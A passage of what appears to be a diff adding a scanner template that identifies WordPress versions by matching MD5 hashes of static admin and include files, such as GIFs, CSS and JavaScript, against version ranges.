"(\"e5012902a358fbb96031acdcf048d7ca\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"c313ffcd0a1fe87b0a65dc2553e0ffdb\" == md5(body))" + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"a815dc7ad6c4175e95bc48f3ab6832e9\" == md5(body))" + - type: dsl + name: 2.5 - 3.2.1 + dsl: + - "(\"6a03660e0544b85fc84d4de174c28741\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"94ecab09335897c4ab392bef96366e7e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/media-button-video.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"abaac3dfd81fbf72e578f13451eae7d0\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"91c6cc0f67412e41acf7bdc63d2c4ee0\" == md5(body))" + - type: dsl + name: 3.0 - 3.8.35 + dsl: + - "(\"ba34507befaa9b9b06e96c6c846bab69\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"bc7efebd002f34e8e6c30769ff417bdd\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"c2d206df3efdc0db758b8065ad77f04a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/media-button-other.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"8bc6b46bc70c7c1918dce62c4fe3229c\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"1f8f339019a4dea621a161a23743fa28\" == md5(body))" + - type: dsl + name: 3.0 - 3.8.35 + dsl: + - "(\"94e0e87b48fc4c7830164d48cfb41e7f\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"22dd6f85320fb13797ab7e3ff890515b\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"a55126545e825d4242990e670227f9c3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/media-button-image.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"7ea2c9c157c38edb40b1ce62d572d5b3\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"62a84ad3d4d2921ecb1c0f86d8f0f790\" == md5(body))" + - type: dsl + name: 3.0 - 3.8.35 + dsl: + - "(\"538670efb6e78fcfdd4662623be4e675\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"0357183d4a361456b8b121209af5c608\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"1df8ccf3a8b6f86dbe09278ae8e60141\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/bubble_bg.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"3d2cb3f7baa628c9e51a326356e72038\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"49ce47d14ff136019b315b72fa1e28e9\" == md5(body))" + - type: dsl + name: 2.5 - 3.8.35 + dsl: + - "(\"b78fd5758e486128cf448c5973ca6ee4\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"fa7ecf673cc487f349a0c1ac1f1eae30\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/sort.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"2e8acb8dee99bfbcb61bd46c486a995d\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"8e2fbe1407bfc897c457aa1bd3e24e1a\" == md5(body))" + - type: dsl + name: 3.1 - 3.8.35 + dsl: + - "(\"2bf510e2b04bacc1677a7a04dc318abf\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"fba0b2ac81a0edbd2aa220aa92dacf33\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/media-button-music.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"eff55df37f325c5aae2f02e4d913de95\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"91c40146718f73144dde29494a6f9c3c\" == md5(body))" + - type: dsl + name: 3.0 - 3.8.35 + dsl: + - "(\"423f910219d605ddd355681816a08b45\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"0fec8f86c9c036a2ecf54dbb66a63133\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"345e0f26246fc3e8a00b75662610f498\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/date-button.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"979d8e2e08aada49819556950ec48ff6\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"cd3b134e8fd47881f1841a857ebd97f0\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"946eeed3973aa98d1833849d9a4bf8da\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"6785862d31a929183751cfa86cddfdca\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"762130cf9d24c70a2de6bdae4ce5cc54\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/date-button-2x.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"2952932c246bf9828429361643a8bb63\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"253b7509a7739e2f5338a29f76bea171\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"5d78ee005f9f25fad855bef396a5e822\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"c28b3fbea9a861b430fdd7394a511a96\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/wp-fullscreen-stub.min.js" + matchers: + - type: dsl + name: 4.3 - 5.2.9 + dsl: + - "(\"700a94e9934c7b419dfa6790b1dc4a35\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"1524661e32c6718ba9ca81314b5272f8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelementplayer.css" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"957da4b922728f725cb6369cc9f28957\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"8831e7c4aa4ca8eff635fa01d1210aa1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelementplayer-legacy.css" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"c4eb4f7315c64a37361986e2e5d3314e\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"9d0ee441d256fd74d046c6a3b6188996\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-migrate.min.js" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"3fefcdeb28220a3107a61ca3af3070f9\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"52bec302d465dd23422d9986af7bfa3a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/moxie.min.js" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"68dec65b1e80b2b66994f4700762b65c\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"5b6e97b8f1fc2f1cef763570a8b578da\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/plupload.min.js" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"47d38d462d5fa882a92dbd2b54d5d747\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"257fc7bf0ae0ea044d61aa63b6c06f7c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/imgareaselect/jquery.imgareaselect.min.js" + matchers: + - type: dsl + name: 4.3 - 4.9.4 + dsl: + - "(\"25f42e049e65ee16d442799755724025\" == md5(body))" + - type: dsl + name: 3.7 - 4.2.29 + dsl: + - "(\"0030d4ba4c429d776d23c2e37775873a\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"6bc47583ef2dfc50dda136132e465b5f\" == md5(body))" + - type: dsl + name: 4.9.5 - 5.2.9 + dsl: + - "(\"959b49d52e2ff3abd7b9e48440679dff\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"a12d313609d2dfa8c9f7b1db8896ac29\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_cry.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"453e7a3f8bbb417008f06d576c41d060\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"5da5f07ede5730e210dafae8d97f1f62\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"7605eca95aaeda46e641745ef6f0e0b0\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"e6d886c8d4923e8242445dcda52e4395\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"8f2b60c5ae6490575df6a4d5cbf09768\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_evil.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"63bf101bd3d4f7564d3cf31822218d2e\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"2423931c62f57d3c2976801421abbb05\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"178255bb3fe2c3aa790c1f8ec8738504\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"4cc062e08ae0266dc7f083d3bb9a55f8\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"03d05e8df44d8f3eca070e7a9302e5f8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_lol.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"d4f04dc65a387ca9b8c0f22ca8c0ec8c\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"fe9ded95d13eaf65b383cfb6b7798108\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"b76e7729d43c4a49182d020741285bef\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"c9d90ece68db8c95c73fa1d5b80dcc12\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"6ec199f5e3ff3ad1b7268a83f9d628bc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_rolleyes.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"afc8bbc65fcbd2b82a3e2c1ab41a216a\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"89077d93d01d6f71dc21674b9f545d17\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"19071b1af987946e96dcef6ce0611c6b\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"2858c5350a62df8cb2ca03553b09a66e\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"5f3587060ecb103649bdd81498c49445\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/wpspin-2x.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"7def33aad959cd289d49ddf2a41f076d\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"450b52bd860e667a0fa3c00b82b58a18\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"fb714faf3721341922499a9e56c92a0c\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"6d53acfb07ac1bfdd0db79224389c4d2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/bubble_bg-2x.gif" + matchers: + - type: dsl + name: 3.9 - 4.9.16 + dsl: + - "(\"16523d5bf9efd8ca3b92e7631edfc513\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"1a76a1434d972ee849b119e69cd3f2ba\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"5bcd62dbf3804ccafc509e076fc072bb\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"cfac1d71069a6a99198c0a8a1358c23c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wpspin_light-2x.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"7def33aad959cd289d49ddf2a41f076d\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"450b52bd860e667a0fa3c00b82b58a18\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"fb714faf3721341922499a9e56c92a0c\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"6d53acfb07ac1bfdd0db79224389c4d2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-embed-template.min.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"433386de4a64b9ca6d74e14756bdaff6\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"c330e071f58f3c8aa254c02f11906bff\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"4aa156587449104f531647e71df6da12\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"5ea02d6d347946e4d2344e336da3cf8d\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"24bd34d51376d78109ab3bcb61b66621\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/wp-mediaelement.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"eb76120347829c4ba3576665b2d871f0\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.19 + dsl: + - "(\"74ca084f6791af45527be4b531909512\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"ad088d44c475a26d541c1b3988a8a274\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"2b5b1702953af1d79db2e16f477fc709\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"ea958276b7de454bd3c2873f0dc47e5f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js" + matchers: + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"bf3a6ad4463d6f0d2bc861cbcb05c799\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"1209a4457fcf2627d2a93bc840fa6b5a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/backbone.js" + matchers: + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"8a8d829617513f36185a0ab055d088ec\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"222432686a333255fd0f9b8fa4d4e713\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"c6cc2ce4842cf34494b20855418ec7ee\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"bb7500b816de10f3ada065bb1ff9c53b\" == md5(body))" + - type: dsl + name: 4.2 - 4.4.24 + dsl: + - "(\"7ceb852c73b74dc1b5f5f015be95506d\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"cdabff9760b3ee59012f88238165a5d3\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"d1ce7b53e26d646fdb640f194bcbc873\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.form.min.js" + matchers: + - type: dsl + name: 3.7 - 4.8.15 + dsl: + - "(\"dbc3808473def00fce45fe564dc72dcb\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"5b000ac69e0bc5325856cfe2ce588b88\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"4534fa47fab86ef0aca5345e30ddf509\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"26737b44eebb5d66ee9af634a284b602\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"60ef76775035959651341315c9d82129\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/xfn.js" + matchers: + - type: dsl + name: 3.8 - 4.9.5 + dsl: + - "(\"e2d6eecbd774af1e2bb1a16ec117286b\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"d627144ce38e26b1b1fd91b5dcb503ff\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"f3b3ae0e44fefe8c9bbb517f24c1b9bd\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"2c3b9f9d90fbe685791b2fc0db9e6e03\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"ab6a19cf026e7befa133ff49e4d27e66\" == md5(body))" + - type: dsl + name: 2.3 - 2.7.1 + dsl: + - "(\"c77c9e9a636feadfd1b2d7c07e2f2ba9\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.0.11 + dsl: + - "(\"8de5f12403af4eb425b9ae18dad17266\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"ad6873245a6fbaea4904dbf8b7dd6a17\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"f715e9cd03d570820eb81c2990a2b70b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/wpspin.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"dd4e6dd268a70ce4c1c5143b1a4092dd\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"47c0d8a119ae5a58419577e31ab6ae6d\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"67f40a30bfa13743e5c4e86bfa467a90\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"aa851d7ff94a60fee301e64fdd9d932b\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"b648dcfda6e61acff51cedf8b0f5bfcd\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"680f6b9e75cb52aa0d40396b0cf792e7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_redface.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"1c6d8b101c821641f983175221346112\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"ddeac27dd6f38bce798023a25a66010a\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"d7e9d095432cbcf09375ffc782c30c23\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"00b44044422c6becd1a5c406da47c1bd\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"ab6dbc90184c83abb8d6568678656813\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"bf8fd5fe9c1555cbd7ed45f9a0a81bd3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wpspin_light.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"dd4e6dd268a70ce4c1c5143b1a4092dd\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"47c0d8a119ae5a58419577e31ab6ae6d\" == md5(body))" + - type: dsl + name: 2.8 - 3.8.35 + dsl: + - "(\"67f40a30bfa13743e5c4e86bfa467a90\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"aa851d7ff94a60fee301e64fdd9d932b\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"b648dcfda6e61acff51cedf8b0f5bfcd\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"680f6b9e75cb52aa0d40396b0cf792e7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-widgets.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"0644973027df3f85de27c60da2f331ec\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"b8abf8533b9e8ed351e6f32b2b2e49c8\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"1c97af19b90531018baaebef22409f09\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"836b211538c005fe30eeeac5cb77f1ea\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"eefa6b818378b15f66df7ae4e4bcc1a7\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"868832fcafbffba43f5ba4fbf31d3ca5\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"ca4ef58229b7d12a77bb60cc6ea231d2\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"acd03e77aacb18576947d110cca65544\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"93ac996cd96a82677bf4bbd232f7fb36\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"99cdc663d5a19b883273cc555870d62f\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"72dd5584fa727bd5baacf7dad434e8e1\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"762e45e43b243cdd5613822eccdb17c6\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"f422c35039c6734975166686fc7af611\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-widgets-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"5965d62fa0d33a604e31b2881b6c5bfa\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"bc6035ebcc286399ae80c63933562faa\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"4720a573460d8da3d0963651bdaec68c\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"143a3d5327d5d29e881ebb29ceefacd3\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"1ca6e43e5d42931eee34e8be303da579\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"86d0504f3f24934ce87ed755d6d16a98\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"1755ee3900efb17a46a759c8572dc567\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"279416d29c68b762749a15d4519668b5\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"1e6b1ae2030a4587df5918fbd8d42d50\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"89b4d71e95967154937c6c048763b7a6\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"7a8fa3d526d993a0cc51ee54c37c9b70\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"1dc14d3cebe57f518905d426b4803183\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"dd3522e0b40b9053c20ddfb4d5f77d3d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-embed-template.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"c01952804cd717c96afe10e9689bbd32\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"58d51bdeef6c8132410f1a7af5be8eec\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"7b0e9fbc77ba53dac197347efddb1e71\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"61723e2c0626c3699227340874240412\" == md5(body))" + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"97969382af4adc0bd1376c79a17aadc1\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"a4809c461ae933672aff7c1ba04a47b0\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"6bd3bd8591e2514b36cab474effcbbe4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/sodium_compat/LICENSE" + matchers: + - type: dsl + name: 5.2 - 5.6 + dsl: + - "(\"f578e4bb36468303006691e1a00ef996\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.3 + dsl: + - "(\"02c9c94b41a1e8638cbca074f88626f7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-a11y.min.js" + matchers: + - type: dsl + name: 4.8 - 5.2.2 + dsl: + - "(\"7fb5f1a0757b4fc79ac7c5b1920e0f8e\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"fadd746cdddaafb9978cbab2e4e4580f\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"860cbbecce6b0a5fcbb0c0faa956011a\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"7fc4397387256fc4d513baf001563c34\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"5101bab08ad453ef4ef7313918074a14\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-a11y.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"06817ec8f4ac54ab29fbd71a8c3d1439\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"201a720227378280081f67809d781ab2\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"807223bbf40755fb69e7a55413c63a4d\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"9496a3e87aed4ca075c24a6710fadd6b\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"711c49a2ed00535aa8aa3fc7af0a2420\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.2 + dsl: + - "(\"e1833e40af087af9c866a143327930cf\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"cd187287656f5a29a85e557f572f3edc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-sanitize.js" + matchers: + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"c82ddb34090cba66aff7d12291e75f21\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.2 + dsl: + - "(\"60dfe49df8846db04ec663ab443f9779\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.6 + dsl: + - "(\"be9dc83a6b99eaf3458b743651d01b99\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"fc31bb3d75b7635ca8249600a9884236\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"dce840159a3f860c4ff689aa2cd11428\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"f197cd93b28210923e3590c4438eb896\" == md5(body))" + - type: dsl + name: 4.1 - 4.4.24 + dsl: + - "(\"d810b096023695b38bf682f20774af98\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"15d11156e6d93cd993e75971fb61712c\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"ee5f5ccfd4888467dd6416394b03f9d0\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"0ff73636f81476df81569e7ea7877b00\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.2 + dsl: + - "(\"5ef8706c50672b8945100bf3bba5ecc6\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.6 + dsl: + - "(\"c221f3fd3ce085bb175deabbd1720788\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/link/plugin.min.js" + matchers: + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"a52a04f149c6e052aeb22456a611480c\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.2 + dsl: + - "(\"da71d62b165ecde69d1b7afb554ebb79\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.6 + dsl: + - "(\"b0f6565c1b120a5dcce1014bfb7327a0\" == md5(body))" + - method: GET + path: + - 